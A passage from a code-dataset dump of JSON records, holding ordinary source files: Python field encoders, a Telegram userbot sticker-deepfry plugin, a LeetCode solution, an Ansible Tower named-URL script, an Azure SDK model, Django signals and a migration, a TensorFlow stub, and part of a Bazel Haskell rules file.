hologram import (\n FieldEncoder, JsonSchemaMixin, JsonDict, ValidationError\n)\n\nfrom datetime import timedelta\nfrom typing import NewType\n\n\nPort = NewType('Port', int)\n\n\nclass PortEncoder(FieldEncoder):\n @property\n def json_schema(self):\n return {'type': 'integer', 'minimum': 0, 'maximum': 65535}\n\n\nclass TimeDeltaFieldEncoder(FieldEncoder[timedelta]):\n \"\"\"Encodes timedeltas to dictionaries\"\"\"\n\n def to_wire(self, value: timedelta) -> float:\n return value.total_seconds()\n\n def to_python(self, value) -> timedelta:\n if isinstance(value, timedelta):\n return value\n try:\n return timedelta(seconds=value)\n except TypeError:\n raise ValidationError(\n 'cannot encode {} into timedelta'.format(value)\n ) from None\n\n @property\n def json_schema(self) -> JsonDict:\n return {'type': 'number'}\n\n\nJsonSchemaMixin.register_field_encoders({\n Port: PortEncoder(),\n timedelta: TimeDeltaFieldEncoder()\n})\n"} {"ext": "py", "sha": "1a31220ea5ef7ebf8b9ed118138ac41a58285c32", "content": "\n# Copyright (C) 2019 The Raphielscape Company LLC.\n#\n# Licensed under the Raphielscape Public License, Version 1.d (the \"License\");\n# you may not use this file except in compliance with the License.\n#\n\n# Original source for the deepfrying code (used under the following\n# license): https://github.com/Ovyerus/deeppyer\n\n# MIT License\n#\n# Copyright (c) 2017 Ovyerus\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n# Ported from Xtra-telegram by @heyworld\n\n# KING USERBOT\n\nimport os\nfrom telethon.errors.rpcerrorlist import YouBlockedUserError\n\nfrom userbot.events import register\nfrom userbot import bot, TEMP_DOWNLOAD_DIRECTORY, CMD_HELP\n\n\n@register(outgoing=True, pattern=r'^.kekuatan(:? |$)([1-8])?')\nasync def _(fry):\n await fry.edit(\"`King Mengaktifkan Kekuatan Telegram...⚡`\")\n level = fry.pattern_match.group(2)\n if fry.fwd_from:\n return\n if not fry.reply_to_msg_id:\n await fry.edit(\"`Mohon Balas Di Sticker King`\")\n return\n reply_message = await fry.get_reply_message()\n if not reply_message.media:\n await fry.edit(\"`Gambar tidak di dukung`\")\n return\n if reply_message.sender.bot:\n await fry.edit(\"`Mohon Balas Di Sticker King`\")\n return\n chat = \"@image_deepfrybot\"\n message_id_to_reply = fry.message.reply_to_msg_id\n async with fry.client.conversation(chat) as conv:\n try:\n msg = await conv.send_message(reply_message)\n if level:\n m = f\"/deepfry {level}\"\n msg_level = await conv.send_message(\n m,\n reply_to=msg.id)\n r = await conv.get_response()\n response = await conv.get_response()\n else:\n response = await conv.get_response()\n \"\"\" - don't spam notif - \"\"\"\n await bot.send_read_acknowledge(conv.chat_id)\n except YouBlockedUserError:\n await fry.reply(\"`King Mohon Unblock` @image_deepfrybot`...`\")\n return\n if response.text.startswith(\"Forward\"):\n await fry.edit(\"`King Mohon Matikan Setelan Forward Privasi...`\")\n else:\n downloaded_file_name = await fry.client.download_media(\n response.media,\n TEMP_DOWNLOAD_DIRECTORY\n )\n await fry.client.send_file(\n fry.chat_id,\n downloaded_file_name,\n force_document=False,\n reply_to=message_id_to_reply\n )\n \"\"\" - cleanup chat after completed - \"\"\"\n try:\n msg_level\n except NameError:\n await fry.client.delete_messages(conv.chat_id,\n [msg.id, response.id])\n else:\n await fry.client.delete_messages(\n conv.chat_id,\n [msg.id, response.id, r.id, msg_level.id])\n await fry.delete()\n return os.remove(downloaded_file_name)\n\n\n@register(outgoing=True, pattern=r'^.df(:? |$)([1-8])?')\nasync def _(fry):\n await fry.edit(\"`Sedang Dalam Proses......`\")\n level = fry.pattern_match.group(2)\n if fry.fwd_from:\n return\n if not fry.reply_to_msg_id:\n await fry.edit(\"`Mohon Balas Di Sticker King`\")\n return\n reply_message = await fry.get_reply_message()\n if not reply_message.media:\n await fry.edit(\"`Mohon Balas Di Sticker King`\")\n return\n if reply_message.sender.bot:\n await fry.edit(\"`Mohon Balas Di Sticker King`\")\n return\n chat = \"@image_deepfrybot\"\n message_id_to_reply = fry.message.reply_to_msg_id\n async with fry.client.conversation(chat) as conv:\n try:\n msg = await conv.send_message(reply_message)\n if level:\n m = f\"/deepfry {level}\"\n msg_level = await conv.send_message(\n m,\n reply_to=msg.id)\n r = await conv.get_response()\n response = await conv.get_response()\n else:\n response = await conv.get_response()\n \"\"\" - don't spam notif - \"\"\"\n await bot.send_read_acknowledge(conv.chat_id)\n except YouBlockedUserError:\n await fry.reply(\"`King Mohon Unblock` @image_deepfrybot`...`\")\n return\n if response.text.startswith(\"Forward\"):\n await fry.edit(\"`King Mohon Matikan Setelan Privasi Forward...`\")\n else:\n downloaded_file_name = await fry.client.download_media(\n response.media,\n TEMP_DOWNLOAD_DIRECTORY\n )\n await fry.client.send_file(\n fry.chat_id,\n downloaded_file_name,\n force_document=False,\n reply_to=message_id_to_reply\n )\n \"\"\" - cleanup chat after completed - \"\"\"\n try:\n msg_level\n except NameError:\n await fry.client.delete_messages(conv.chat_id,\n [msg.id, response.id])\n else:\n await fry.client.delete_messages(\n conv.chat_id,\n [msg.id, response.id, r.id, msg_level.id])\n await fry.delete()\n return os.remove(downloaded_file_name)\n\n\nCMD_HELP.update({\n \"kekuatan\":\n \"**Modules: __Kekuatan__\\n\\n⚡𝘾𝙈𝘿⚡: `.kekuatan` / `.kekuatan [level(1-8)]`\"\n \"\\n**Penjelasan:** untuk mengubah foto/sticker.\"\n})\n"} {"ext": "py", "sha": "1a312242c7dee2b9a7e6b1e22412161f90d85d84", "content": "from collections import Counter\nclass Solution:\n def removeDuplicateLetters(self, s: str) -> str:\n counter = Counter(s)\n seen = set()\n stack = []\n \n for letter in s:\n counter[letter] -= 1\n \n if letter in seen:\n continue\n \n while stack and stack[-1] > letter and counter[stack[-1]] > 0:\n seen.remove(stack.pop())\n \n stack.append(letter)\n seen.add(letter)\n \n return \"\".join(stack)\n"} {"ext": "py", "sha": "1a31236e0d3942882dcfcbd16cb03a0df595a349", "content": "#!/usr/bin/env python\nimport argparse\nimport six\n\nimport requests\n\n\nNAMED_URL_RES_DILIMITER = \"--\"\nNAMED_URL_RES_INNER_DILIMITER = \"-\"\nNAMED_URL_RES_DILIMITER_ENCODE = \"%2D\"\nURL_PATH_RESERVED_CHARSET = {}\nfor c in ';/?:@=&[]':\n URL_PATH_RESERVED_CHARSET[c] = six.moves.urllib.parse.quote(c, safe='')\n\n\ndef _get_named_url_graph(url, auth):\n \"\"\"Get the graph data structure Tower used to manage all named URLs.\n\n Args:\n url: String representing the URL of tower configuration endpoint where\n to fetch graph information.\n auth: Tuple of username + password to authenticate connection to Tower.\n\n Return:\n A dict of graph nodes that in ensembly represent the graph structure. Each\n node is represented as a dict of 'fields' and 'adj_list'.\n\n Raises:\n N/A\n \"\"\"\n r = requests.get(url, auth=auth, verify=False)\n ret = r.json()['NAMED_URL_GRAPH_NODES']\n return ret\n\n\ndef _encode_uri(text):\n \"\"\"Properly encode input text to make it satisfy named URL convention.\n\n Args:\n text: the original string to be encoded.\n\n Return:\n The encoded string\n\n Raises:\n N/A\n \"\"\"\n for c in URL_PATH_RESERVED_CHARSET:\n if c in text:\n text = text.replace(c, URL_PATH_RESERVED_CHARSET[c])\n text = text.replace(NAMED_URL_RES_INNER_DILIMITER,\n '[%s]' % NAMED_URL_RES_INNER_DILIMITER)\n return text\n\n\ndef _generate_identifier_component(response, fields):\n \"\"\"Generate an individual component of named URL identifier.\n\n Args:\n response: JSON containing the details of a particular resource object.\n fields: name of resource object fields needed to generate a named URL\n identifier component.\n\n Return:\n A string representing generated identifier component.\n\n Raises:\n N/A\n \"\"\"\n ret = []\n for field_name in fields:\n ret.append(_encode_uri(response[field_name]))\n return NAMED_URL_RES_INNER_DILIMITER.join(ret)\n\n\ndef _get_named_url_identifier(url, named_url_graph, resource, tower_host, auth, ret):\n \"\"\"DFS the named URL graph structure to generate identifier for a resource object.\n\n Args:\n url: A string used to access a particular resource object to generate identifier\n component from.\n named_url_graph: The graph structure used to DFS against.\n resource: Key name of the current graph node.\n tower_host: String representing the host name of Tower backend.\n auth: Tuple of username + password to authenticate connection to Tower.\n ret: list of strings storing components that would later be joined into\n the final named URL identifier.\n\n Return:\n None. Note the actual outcome is stored in argument ret due to the recursive\n nature of this function.\n\n Raises:\n \"\"\"\n r = requests.get(url, auth=auth, verify=False).json()\n ret.append(_generate_identifier_component(r, named_url_graph[resource]['fields']))\n for next_ in named_url_graph[resource]['adj_list']:\n next_fk, next_res = tuple(next_)\n if next_fk in r['related']:\n _get_named_url_identifier(tower_host.strip('/') + r['related'][next_fk],\n named_url_graph, next_res, tower_host, auth, ret)\n else:\n ret.append('')\n\n\ndef main(username=None, password=None, tower_host=None, resource=None, pk=None):\n \"\"\"Main function for generating and printing named URL of a resource object given its pk.\n\n Args:\n username: String representing the username needed to authenticating Tower.\n password: String representing the password needed to authenticating Tower.\n tower_host: String representing the host name of Tower backend.\n resource: REST API name of a specific resource, e.g. name for resource inventory\n is 'inventories'.\n pk: Primary key of the resource object whose named URL will be derived.\n\n Returns:\n None\n\n Raises:\n N/A\n \"\"\"\n start_url = '%s/api/v2/%s/%s/' % (tower_host.strip('/'), resource.strip('/'), pk)\n conf_url = '%s/api/v2/settings/named-url/' % tower_host.strip('/')\n auth = (username, password)\n named_url_graph = _get_named_url_graph(conf_url, auth)\n named_url_identifier = []\n _get_named_url_identifier(start_url, named_url_graph, resource,\n tower_host, auth, named_url_identifier)\n print('%s/api/v2/%s/%s/' % (tower_host.strip('/'), resource.strip('/'),\n NAMED_URL_RES_DILIMITER.join(named_url_identifier)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', type=str, required=True,\n help='Name of the Tower user for making requests',\n dest='username', metavar='STR')\n parser.add_argument('--password', type=str, required=True,\n help='Password of the Tower user for making requests',\n dest='password', metavar='STR')\n parser.add_argument('--tower-host', type=str, required=True,\n help='Tower host name, like \"http://127.0.0.1\"',\n dest='tower_host', metavar='STR')\n parser.add_argument('--resource', type=str, required=True,\n help='Name of the resource in REST endpoints',\n dest='resource', metavar='STR')\n parser.add_argument('--pk', type=int, required=True,\n help='Primary key of resource object whose named URL will be derived',\n dest='pk', metavar='INT')\n main(**vars(parser.parse_args()))\n"} {"ext": "py", "sha": "1a31245a4a0cb45323077cf7454190ca2e1a537d", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ConnectionMonitorResult(Model):\n \"\"\"Information about the connection monitor.\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n All required parameters must be populated in order to send to Azure.\n\n :ivar name: Name of the connection monitor.\n :vartype name: str\n :ivar id: ID of the connection monitor.\n :vartype id: str\n :param etag: Default value: \"A unique read-only string that changes\n whenever the resource is updated.\" .\n :type etag: str\n :ivar type: Connection monitor type.\n :vartype type: str\n :param location: Connection monitor location.\n :type location: str\n :param tags: Connection monitor tags.\n :type tags: dict[str, str]\n :param source: Required.\n :type source:\n ~azure.mgmt.network.v2017_11_01.models.ConnectionMonitorSource\n :param destination: Required.\n :type destination:\n ~azure.mgmt.network.v2017_11_01.models.ConnectionMonitorDestination\n :param auto_start: Determines if the connection monitor will start\n automatically once created. Default value: True .\n :type auto_start: bool\n :param monitoring_interval_in_seconds: Monitoring interval in seconds.\n Default value: 60 .\n :type monitoring_interval_in_seconds: int\n :param provisioning_state: The provisioning state of the connection\n monitor. Possible values include: 'Succeeded', 'Updating', 'Deleting',\n 'Failed'\n :type provisioning_state: str or\n ~azure.mgmt.network.v2017_11_01.models.ProvisioningState\n :param start_time: The date and time when the connection monitor was\n started.\n :type start_time: datetime\n :param monitoring_status: The monitoring status of the connection monitor.\n :type monitoring_status: str\n \"\"\"\n\n _validation = {\n 'name': {'readonly': True},\n 'id': {'readonly': True},\n 'type': {'readonly': True},\n 'source': {'required': True},\n 'destination': {'required': True},\n }\n\n _attribute_map = {\n 'name': {'key': 'name', 'type': 'str'},\n 'id': {'key': 'id', 'type': 'str'},\n 'etag': {'key': 'etag', 'type': 'str'},\n 'type': {'key': 'type', 'type': 'str'},\n 'location': {'key': 'location', 'type': 'str'},\n 'tags': {'key': 'tags', 'type': '{str}'},\n 'source': {'key': 'properties.source', 'type': 'ConnectionMonitorSource'},\n 'destination': {'key': 'properties.destination', 'type': 'ConnectionMonitorDestination'},\n 'auto_start': {'key': 'properties.autoStart', 'type': 'bool'},\n 'monitoring_interval_in_seconds': {'key': 'properties.monitoringIntervalInSeconds', 'type': 'int'},\n 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},\n 'start_time': {'key': 'properties.startTime', 'type': 'iso-8601'},\n 'monitoring_status': {'key': 'properties.monitoringStatus', 'type': 'str'},\n }\n\n def __init__(self, **kwargs):\n super(ConnectionMonitorResult, self).__init__(**kwargs)\n self.name = None\n self.id = None\n self.etag = kwargs.get('etag', \"A unique read-only string that changes whenever the resource is updated.\")\n self.type = None\n self.location = kwargs.get('location', None)\n self.tags = kwargs.get('tags', None)\n self.source = kwargs.get('source', None)\n self.destination = kwargs.get('destination', None)\n self.auto_start = kwargs.get('auto_start', True)\n self.monitoring_interval_in_seconds = kwargs.get('monitoring_interval_in_seconds', 60)\n self.provisioning_state = kwargs.get('provisioning_state', None)\n self.start_time = kwargs.get('start_time', None)\n self.monitoring_status = kwargs.get('monitoring_status', None)\n"} {"ext": "py", "sha": "1a31246fb0511e1af29e081496c47cec931f0079", "content": "from django.db.models.signals import pre_save, post_delete\nfrom django.dispatch import receiver\nfrom .serializers import XXTMP_PO_HEADERS, ElasticPO_headersSerializer\n\n\n@receiver(pre_save, sender=XXTMP_PO_HEADERS, dispatch_uid=\"update_record\")\ndef update_es_record(sender, instance, **kwargs):\n obj = ElasticPO_headersSerializer(instance)\n obj.save()\n\n\n@receiver(post_delete, sender=XXTMP_PO_HEADERS, dispatch_uid=\"delete_record\")\ndef delete_es_record(sender, instance, *args, **kwargs):\n obj = ElasticPO_headersSerializer(instance)\n obj.delete(ignore=404)\n"} {"ext": "py", "sha": "1a3124710842e08574b7d0b22373bdfce04a0c52", "content": "# Generated by Django 2.2.13 on 2020-07-21 23:29\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('scales', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='scale',\n name='created_at',\n field=models.TimeField(default=datetime.datetime(2020, 7, 21, 23, 29, 11, 517956), editable=False),\n ),\n migrations.AlterField(\n model_name='scale',\n name='created_when',\n field=models.DateField(default=datetime.datetime(2020, 7, 21, 23, 29, 11, 517998), editable=False),\n ),\n ]\n"} {"ext": "py", "sha": "1a31249dd4025a966d8f9e01d3235e3a9810453b", "content": "# This file is MACHINE GENERATED! Do not edit.\n# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.\n\"\"\"Public API for tf.keras.applications.densenet namespace.\n\"\"\"\n\nfrom __future__ import print_function as _print_function\n\nimport sys as _sys\n\nfrom keras.applications.densenet import DenseNet121\nfrom keras.applications.densenet import DenseNet169\nfrom keras.applications.densenet import DenseNet201\nfrom keras.applications.densenet import decode_predictions\nfrom keras.applications.densenet import preprocess_input\n\ndel _print_function\n"} {"ext": "bzl", "sha": "1a312549920f465562521a5e820a0bcecda9f0bf", "content": "\"\"\"Implementation of core Haskell rules\"\"\"\n\nload(\"@bazel_skylib//lib:dicts.bzl\", \"dicts\")\nload(\n \":providers.bzl\",\n \"C2hsLibraryInfo\",\n \"HaddockInfo\",\n \"HaskellInfo\",\n \"HaskellLibraryInfo\",\n \"HaskellToolchainLibraryInfo\",\n \"all_dependencies_package_ids\",\n)\nload(\":cc.bzl\", \"cc_interop_info\")\nload(\n \":private/actions/info.bzl\",\n \"compile_info_output_groups\",\n \"library_info_output_groups\",\n)\nload(\n \":private/actions/link.bzl\",\n \"link_binary\",\n \"link_library_dynamic\",\n \"link_library_static\",\n)\nload(\":private/actions/package.bzl\", \"package\")\nload(\":private/plugins.bzl\", \"resolve_plugin_tools\")\nload(\":private/actions/runghc.bzl\", \"build_haskell_runghc\")\nload(\":private/context.bzl\", \"haskell_context\")\nload(\":private/dependencies.bzl\", \"gather_dep_info\")\nload(\":private/expansions.bzl\", \"expand_make_variables\", \"haskell_library_extra_label_attrs\")\nload(\":private/java.bzl\", \"java_interop_info\")\nload(\":private/mode.bzl\", \"is_profiling_enabled\")\nload(\n \":private/path_utils.bzl\",\n \"determine_module_names\",\n \"get_dynamic_hs_lib_name\",\n \"get_lib_extension\",\n \"get_static_hs_lib_name\",\n \"infer_main_module\",\n \"ln\",\n \"match_label\",\n \"parse_pattern\",\n)\nload(\":private/pkg_id.bzl\", \"pkg_id\")\nload(\":private/set.bzl\", \"set\")\nload(\":private/list.bzl\", \"list\")\nload(\":private/version_macros.bzl\", \"generate_version_macros\")\nload(\":providers.bzl\", \"GhcPluginInfo\", \"HaskellCoverageInfo\")\nload(\"@bazel_skylib//lib:paths.bzl\", \"paths\")\nload(\"@bazel_skylib//lib:collections.bzl\", \"collections\")\nload(\"@bazel_skylib//lib:shell.bzl\", \"shell\")\nload(\"@rules_cc//cc:find_cc_toolchain.bzl\", \"find_cc_toolchain\")\nload(\"//haskell/experimental:providers.bzl\", \"HaskellModuleInfo\")\nload(\"//haskell/experimental/private:module.bzl\", \"build_haskell_modules\", \"get_module_path_from_target\")\n\n# Note [Empty Libraries]\n#\n# GHC 8.10.x wants to load the shared libraries corresponding to packages needed\n# for running TemplateHaskell splices. It wants to do this even when all the\n# necessary object files are passed in the command line.\n#\n# In order to satisfy GHC, and yet avoid passing the linked library as input, we\n# create a ficticious package which points to an empty shared library. The\n# ficticious and the real package share the same interface files.\n#\n# Avoiding to pass the real shared library as input is necessary when building\n# individual modules with haskell_module, otherwise building the module would\n# need to wait until all of the modules of library dependencies have been built.\n#\n# See Note [Narrowed Dependencies] for an overview of what this feature is\n# needed for.\n\ndef _prepare_srcs(srcs):\n srcs_files = []\n import_dir_map = {}\n\n for src in srcs:\n # If it has the \"files\" attribute, it must be a Target\n if hasattr(src, \"files\"):\n if C2hsLibraryInfo in src:\n srcs_files += src.files.to_list()\n for f in src.files.to_list():\n import_dir_map[f] = src[C2hsLibraryInfo].import_dir\n else:\n srcs_files += src.files.to_list()\n\n # otherwise it's just a file\n\n else:\n srcs_files.append(src)\n\n return srcs_files, import_dir_map\n\ndef haskell_test_impl(ctx):\n return _haskell_binary_common_impl(ctx, is_test = True)\n\ndef haskell_binary_impl(ctx):\n return _haskell_binary_common_impl(ctx, is_test = False)\n\ndef _should_inspect_coverage(ctx, hs, is_test):\n return hs.coverage_enabled and is_test\n\ndef _coverage_enabled_for_target(coverage_source_patterns, label):\n for pat in coverage_source_patterns:\n if match_label(pat, label):\n return True\n\n return False\n\n# Mix files refer to genfile srcs including their root. Therefore, we\n# must condition the src filepaths passed in for coverage to match.\ndef _condition_coverage_src(hs, src):\n if not src.path.startswith(hs.genfiles_dir.path):\n return src\n\n \"\"\" Genfiles have the genfile directory as part of their path,\n so declaring a file with the sample path actually makes the new\n file double-qualified by the genfile directory.\n\n This is necessary because mix files capture the genfile\n path before compilation, and then expect those files to be\n qualified by the genfile directory when `hpc report` or\n `hpc markup` are used. But, genfiles included as runfiles\n are no longer qualified. So, double-qualifying them results in\n only one level of qualification as runfiles.\n \"\"\"\n conditioned_src = hs.actions.declare_file(src.path)\n hs.actions.run_shell(\n inputs = [src],\n outputs = [conditioned_src],\n arguments = [\n src.path,\n conditioned_src.path,\n ],\n command = \"\"\"\n mkdir -p $(dirname \"$2\") && cp \"$1\" \"$2\"\n \"\"\",\n )\n\n return conditioned_src\n\ndef _resolve_preprocessors(ctx, preprocessors):\n if not hasattr(ctx, \"resolve_tools\"):\n # No resolve_tools when ctx is faked (see protobuf.bzl).\n return struct(\n inputs = depset(),\n input_manifests = [],\n )\n (inputs, input_manifests) = ctx.resolve_tools(tools = preprocessors)\n return struct(\n inputs = inputs,\n input_manifests = input_manifests,\n )\n\ndef _expand_make_variables(name, ctx, strings):\n # All labels in all attributes should be location-expandable.\n return expand_make_variables(name, ctx, strings, haskell_library_extra_label_attrs(ctx.attr))\n\ndef haskell_module_from_target(m):\n \"\"\" Produces the module name from a HaskellModuleInfo \"\"\"\n return paths.split_extension(get_module_path_from_target(m))[0].replace(\"/\", \".\")\n\ndef is_main_as_haskell_module(modules, main_function):\n main_module = infer_main_module(main_function).replace(\".\", \"/\")\n for m in modules:\n if haskell_module_from_target(m) == main_module:\n return True\n return False\n\ndef _haskell_binary_common_impl(ctx, is_test):\n hs = haskell_context(ctx)\n deps = ctx.attr.deps + ctx.attr.narrowed_deps\n dep_info = gather_dep_info(ctx.attr.name, ctx.attr.deps)\n all_deps_info = gather_dep_info(ctx.attr.name, deps)\n\n modules = ctx.attr.modules\n if modules and ctx.files.srcs:\n fail(\"\"\"Only one of \"srcs\" or \"modules\" attributes must be specified in {}\"\"\".format(ctx.label))\n\n if not modules and ctx.attr.narrowed_deps:\n fail(\"\"\"The attribute \"narrowed_deps\" can only be used if \"modules\" is specified in {}\"\"\".format(ctx.label))\n\n # Note [Plugin order]\n plugin_decl = reversed(ctx.attr.plugins)\n non_default_plugin_decl = reversed(ctx.attr.non_default_plugins)\n all_plugin_decls = plugin_decl + non_default_plugin_decl\n\n plugin_dep_info = gather_dep_info(\n ctx.attr.name,\n [dep for plugin in all_plugin_decls for dep in plugin[GhcPluginInfo].deps],\n )\n package_ids = all_dependencies_package_ids(deps)\n\n # Add any interop info for other languages.\n cc = cc_interop_info(\n ctx,\n override_cc_toolchain = hs.tools_config.maybe_exec_cc_toolchain,\n )\n java = java_interop_info(deps)\n\n # Make shell tools available.\n posix = ctx.toolchains[\"@rules_sh//sh/posix:toolchain_type\"]\n\n # Determine file directories.\n interfaces_dir = paths.join(\"_iface\", hs.name)\n objects_dir = paths.join(\"_obj\", hs.name)\n\n with_profiling = is_profiling_enabled(hs)\n srcs_files, import_dir_map = _prepare_srcs(ctx.attr.srcs)\n main_as_haskell_module = is_main_as_haskell_module(modules, ctx.attr.main_function)\n module_map = determine_module_names(srcs_files, not main_as_haskell_module, ctx.attr.main_function, ctx.file.main_file)\n inspect_coverage = _should_inspect_coverage(ctx, hs, is_test)\n\n dynamic = not ctx.attr.linkstatic\n if with_profiling or hs.toolchain.static_runtime:\n # NOTE We can't have profiling and dynamic code at the\n # same time, see:\n # https://ghc.haskell.org/trac/ghc/ticket/15394\n # Also, static GHC doesn't support dynamic code\n dynamic = False\n\n module_outputs = build_haskell_modules(ctx, hs, cc, posix, \"\", with_profiling, dynamic, interfaces_dir, objects_dir)\n\n plugins = [resolve_plugin_tools(ctx, plugin[GhcPluginInfo]) for plugin in plugin_decl]\n non_default_plugins = [resolve_plugin_tools(ctx, plugin[GhcPluginInfo]) for plugin in non_default_plugin_decl]\n preprocessors = _resolve_preprocessors(ctx, ctx.attr.tools)\n user_compile_flags = _expand_make_variables(\"ghcopts\", ctx, ctx.attr.ghcopts)\n c = hs.toolchain.actions.compile_binary(\n hs,\n cc,\n java,\n posix,\n dep_info,\n plugin_dep_info,\n srcs = srcs_files,\n module_map = module_map,\n import_dir_map = import_dir_map,\n extra_srcs = depset(ctx.files.extra_srcs),\n user_compile_flags = user_compile_flags,\n dynamic = dynamic,\n with_profiling = with_profiling,\n interfaces_dir = interfaces_dir,\n objects_dir = objects_dir,\n main_function = ctx.attr.main_function,\n version = ctx.attr.version,\n inspect_coverage = inspect_coverage,\n plugins = plugins,\n non_default_plugins = non_default_plugins,\n preprocessors = preprocessors,\n )\n\n # gather intermediary code coverage instrumentation data\n coverage_data = c.coverage_data\n for dep in deps:\n if HaskellCoverageInfo in dep:\n coverage_data += dep[HaskellCoverageInfo].coverage_data\n coverage_data = list.dedup_on(_get_mix_filepath, coverage_data)\n\n user_compile_flags = _expand_make_variables(\"ghcopts\", ctx, ctx.attr.ghcopts)\n (binary, solibs) = link_binary(\n hs,\n cc,\n posix,\n all_deps_info,\n ctx.files.extra_srcs,\n user_compile_flags,\n c.object_files + c.dyn_object_files,\n module_outputs.os,\n dynamic = dynamic,\n with_profiling = with_profiling,\n version = ctx.attr.version,\n )\n\n hs_info = HaskellInfo(\n package_databases = all_deps_info.package_databases,\n version_macros = set.empty(),\n source_files = c.source_files,\n boot_files = c.boot_files,\n extra_source_files = c.extra_source_files,\n import_dirs = c.import_dirs,\n hs_libraries = all_deps_info.hs_libraries,\n deps_hs_libraries = all_deps_info.deps_hs_libraries,\n interface_dirs = all_deps_info.interface_dirs,\n deps_interface_dirs = all_deps_info.deps_interface_dirs,\n compile_flags = c.compile_flags,\n user_compile_flags = user_compile_flags,\n user_repl_flags = _expand_make_variables(\"repl_ghci_args\", ctx, ctx.attr.repl_ghci_args),\n )\n cc_info = cc_common.merge_cc_infos(\n cc_infos = [dep[CcInfo] for dep in deps if CcInfo in dep],\n )\n\n target_files = depset([binary])\n\n user_compile_flags = _expand_make_variables(\"ghcopts\", ctx, ctx.attr.ghcopts)\n extra_args = _expand_make_variables(\"runcompile_flags\", ctx, ctx.attr.runcompile_flags)\n build_haskell_runghc(\n hs,\n cc,\n posix,\n runghc_wrapper = ctx.file._ghci_repl_wrapper,\n extra_args = extra_args,\n user_compile_flags = user_compile_flags,\n output = ctx.outputs.runghc,\n package_databases = all_deps_info.package_databases,\n version = ctx.attr.version,\n hs_info = hs_info,\n )\n\n executable = binary\n extra_runfiles = []\n\n if inspect_coverage:\n binary_path = paths.join(ctx.workspace_name, binary.short_path)\n hpc_path = paths.join(ctx.workspace_name, hs.toolchain.tools.hpc.short_path)\n tix_file_path = hs.label.name + \".tix\"\n mix_file_paths = [\n paths.join(ctx.workspace_name, datum.mix_file.short_path)\n for datum in coverage_data\n ]\n mix_file_paths = collections.uniq(mix_file_paths) # remove duplicates\n\n # find which modules to exclude from coverage analysis, by using the specified source patterns\n raw_coverage_source_patterns = ctx.attr.experimental_coverage_source_patterns\n coverage_source_patterns = [parse_pattern(ctx, pat) for pat in raw_coverage_source_patterns]\n modules_to_exclude = [paths.split_extension(datum.mix_file.basename)[0] for datum in coverage_data if not _coverage_enabled_for_target(coverage_source_patterns, datum.target_label)]\n modules_to_exclude = collections.uniq(modules_to_exclude) # remove duplicates\n\n expected_covered_expressions_percentage = ctx.attr.expected_covered_expressions_percentage\n expected_uncovered_expression_count = ctx.attr.expected_uncovered_expression_count\n strict_coverage_analysis = ctx.attr.strict_coverage_analysis\n coverage_report_format = ctx.attr.coverage_report_format\n\n if coverage_report_format != \"text\" and coverage_report_format != \"html\":\n fail(\"\"\"haskell_test attribute \"coverage_report_format\" must be one of \"text\" or \"html\".\"\"\")\n\n wrapper = hs.actions.declare_file(\"{}_coverage/coverage_wrapper.sh\".format(ctx.label.name))\n ctx.actions.expand_template(\n template = ctx.file._coverage_wrapper_template,\n output = wrapper,\n substitutions = {\n \"{binary_path}\": shell.quote(binary_path),\n \"{hpc_path}\": shell.quote(hpc_path),\n \"{tix_file_path}\": shell.quote(tix_file_path),\n \"{expected_covered_expressions_percentage}\": shell.quote(str(expected_covered_expressions_percentage)),\n \"{expected_uncovered_expression_count}\": shell.quote(str(expected_uncovered_expression_count)),\n \"{mix_file_paths}\": shell.array_literal(mix_file_paths),\n \"{modules_to_exclude}\": shell.array_literal(modules_to_exclude),\n \"{strict_coverage_analysis}\": str(strict_coverage_analysis),\n \"{coverage_report_format}\": shell.quote(ctx.attr.coverage_report_format),\n \"{package_path}\": shell.quote(ctx.label.package),\n },\n is_executable = True,\n )\n executable = wrapper\n mix_runfiles = [datum.mix_file for datum in coverage_data]\n srcs_runfiles = [_condition_coverage_src(hs, datum.src_file) for datum in coverage_data]\n extra_runfiles = [\n ctx.file._bash_runfiles,\n hs.toolchain.tools.hpc,\n binary,\n ] + mix_runfiles + srcs_runfiles + java.inputs.to_list()\n\n return [\n hs_info,\n cc_info,\n DefaultInfo(\n executable = executable,\n files = target_files,\n runfiles = ctx.runfiles(\n files = extra_runfiles + solibs,\n collect_data = True,\n ),\n ),\n OutputGroupInfo(**compile_info_output_groups(\n name = ctx.label.name,\n workspace_name = ctx.workspace_name,\n hs = hs,\n cc = cc,\n c = c,\n posix = posix,\n runfiles = ctx.runfiles(collect_data = True).files,\n )),\n ]\n\ndef _create_empty_library(hs, cc, posix, my_pkg_id, with_shared, with_profiling, empty_libs_dir):\n \"\"\"See Note [Empty Libraries]\"\"\"\n dep_info = gather_dep_info(\"haskell_module-empty_lib\", [])\n empty_c = hs.actions.declare_file(\"empty.c\")\n 